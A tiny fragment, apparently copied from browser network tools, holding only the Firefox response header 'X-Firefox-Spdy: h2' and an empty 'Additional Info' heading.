X-Firefox-Spdy: h2


--- Additional Info ---